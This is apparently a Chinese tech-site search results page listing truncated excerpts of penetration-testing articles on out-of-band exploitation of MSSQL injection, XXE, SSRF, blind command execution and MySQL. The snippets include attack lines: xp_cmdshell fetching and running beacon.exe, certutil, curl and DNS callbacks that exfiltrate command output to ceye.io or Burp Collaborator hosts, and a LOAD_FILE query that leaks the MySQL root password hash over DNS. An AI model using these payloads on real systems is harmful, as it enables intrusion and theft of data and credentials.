首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

MSSQL注入之无利用思路

0x01 前言 前段时间在先知社区里看到“一次另类的mssql渗透之路”一文:一个MSSQL高权限注入点,可通过xp_cmdshell执行命令,但是没有信息。...作者最终的利用思路如下图,但因找不到绝对路径、执行命令,也不能用dnslog将绝对路径外带出来、往中文路径写马等问题导致整个过程很是复杂。...beacon.exe C:\ProgramData\beacon.exe" ;exec master..xp_cmdshell "cmd /c C:\ProgramData\beacon.exe" 注:实战中这个注入没有...,所以暂无法确定这个文件是否已经成功落地到磁盘中,不过我们可以通过执行以下命令来确定文件是否存在,使用httplog方式将执行结果给外带出来,有则存在,则不存在。...beacon.exe*) do certutil -urlcache -split -f http://******.ceye.io/%i' 0x04 获取绝对路径Getshell 我们在实战中有时也会遇到

3.4K10
您找到你想要的搜索结果了吗?
是的
没有找到

技术分析|XXE环境搭建及实战 包含有操作

github.com/c0ny1/xxe-lab 搭建平台:VM、windows7、xampp 靶机IP:192.168.0.133 搭建说明:安装xampp后,htdocs目录放入靶机项目,然后开启apache、mysql...php_xxe/ (注意我这里是改了端口的) 攻击机环境 IP:192.168.0.165 操作系统:windows10 本次实验用到的工具:BurpSite、tomcat7、ngrok 有漏洞利用...>&xxe;123123 文件被正常读取 总结:攻击用到了file协议进行文件读取 不回漏洞信息外带利用...没)用(有)外部服务器,就自己在攻击机上面搭建一个服务器,用于接收数据 说明:需要一个客户端转发内网地址到外网,从而实现穷屌接收数据的伟大梦想 环境: tomcat7、ngrok、假设没有

2.5K10

带外攻击OOB(RCE骚思路总结)

OOB.jpg基本回思路1.对于出网机器  使用http传输,如wget,curl,certutil将回信息爬出   1.1 优点:方便,全。   ...    2.1 优点:不出网机器可以传输    2.2 缺点: 1.是一条条执行,需要将回结果拼接解码,信息比较麻烦          2.短可以使用DNS传输,长大部分带出需要...powershell搭配,但杀毒软件往往禁用powershell,因此利用条件较苛刻3.在线网站DNS/HTTP管道解析经常在拿下shell的时候碰到命令执行的情况,因此为了解决命令执行时,...DNS管道解析的扩展,结合php命令执行可以使用这种方式进行,使用sed命令令变长:执行:http://xxx.xxx.xxx.xxx/test.php?...image.png2.第二种命令格式curl http://n7vp17a6r01mzz87orpsa48z9qfh36.burpcollaborator.net/`whoami`image.pngDNS记录中

4.9K40

mysql逗号的注入技巧

明天就要考试了,然而我还在任性的写代码,真是该剁手,剁手啊… 在一个 ctf比赛中,遇到这样一个注入题: 用户的ip可以用x-forwarded-for来伪造,然后把ip存储到数据库中去,对ip没有进行任何过滤...,存在注入,但是有一个限制就是: 用‘,’逗号对ip地址进行分割,仅仅取逗号前面的第一部分内容。...然后:没有报错,没有,没有bool,只有延时。 送一个字,坑。。。。。 比赛的时候,就各种纠结,想着怎么绕过逗号,没想出来,比赛结束之后,仔细想想,终于搞明白了,做以下的总结。...分析一下: 因为没有报错,没有。所以只能是延时盲注。...测试一下: [python] x-forwarded-for: 10.20.0.12’+sleep(5) and ‘1’=’1 [/python] 果真延时了,注入是存在的,但是怎么出数据呢???

1.7K30

模糊测试之攻击

但是也存在SSRF漏洞以及在XXE相关的漏洞(诸如Blind XXE和Blind SSRF之类的漏洞上)利用上也需要它; 再比如当再实际渗透测试中SQL盲注、命令盲注等漏洞是较难利用的由于这类漏洞即使存在也显得有些鸡肋...dnslog.cn **.**.**.** 2019-07-27 10:45 注意事项: 根据DNS的规定域名的长度是有限制的,有时可能无法将长Cookie完全带出(需要进行分段) 场景四:SSRF解决...描述:很多SSRF的漏洞类型都是,利用DNS来查看利用: #Playload: http://10.10.107.1:8080/ssrf.php?...url=http://php.nf9eex.dnslog.cn 场景五:XXE解决 描述:与xml格式相关的web漏洞传比较广泛的共有 xpath注入、xml注入、soap注入、XXE四种,在进行测试的时候往往也会遇到的情况...ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> %remote;]> 场景六:其他漏洞攻击解决

2.2K20

模糊测试之攻击

但是也存在SSRF漏洞以及在XXE相关的漏洞(诸如Blind XXE和Blind SSRF之类的漏洞上)利用上也需要它; 再比如当再实际渗透测试中SQL盲注、命令盲注等漏洞是较难利用的由于这类漏洞即使存在也显得有些鸡肋...dnslog.cn **.**.**.** 2019-07-27 10:45 注意事项: 根据DNS的规定域名的长度是有限制的,有时可能无法将长Cookie完全带出(需要进行分段) 场景四:SSRF解决...描述:很多SSRF的漏洞类型都是,利用DNS来查看利用: #Playload: http://10.10.107.1:8080/ssrf.php?...url=http://php.nf9eex.dnslog.cn 场景五:XXE解决 描述:与xml格式相关的web漏洞传比较广泛的共有 xpath注入、xml注入、soap注入、XXE四种,在进行测试的时候往往也会遇到的情况...ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> %remote;]> 场景六:其他漏洞攻击解决

3K20

利用DNS协议数据

数据库漏洞复现 当你存在注入点的时候,如果这个查询并不会对你进行一个,这个 out_of_band 就非常有用了,这里并未进行后端查询代码的设计了,直接从数据库开始 测试环境: A机: win7...mysql 环境,对 secure 进行了修改 B机: win10 mysql 环境,未对 secure 进行了修改 参数 secure_file_priv 这个参数是全局变量,可以通过下列语句进行查询...这个值从 MySQL 5.5.53 版本开始允许。 在 MySQL 5.5.53 之前,此变量默认为空,因此我们就可以使用这些函数。但是在 5.5.53 之后的版本中,NULL 值会禁用这些功能。...(根据两台测试机器不同版本的 mysql 来判断,会默认为 mysql 的一个 /upload 根目录下) 补充一下两个机器的 mysql 版本: A 机: ? B 机: ?...: SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.u0ocor.ceye.io

2.3K00
领券